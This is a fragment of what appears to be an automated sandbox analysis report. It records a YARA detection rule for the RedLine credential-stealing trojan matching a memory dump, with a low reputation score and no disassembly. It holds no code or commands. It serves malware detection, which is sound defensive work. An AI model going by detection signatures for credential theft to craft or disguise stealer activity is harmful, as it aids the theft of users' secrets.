            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low

            No disassembly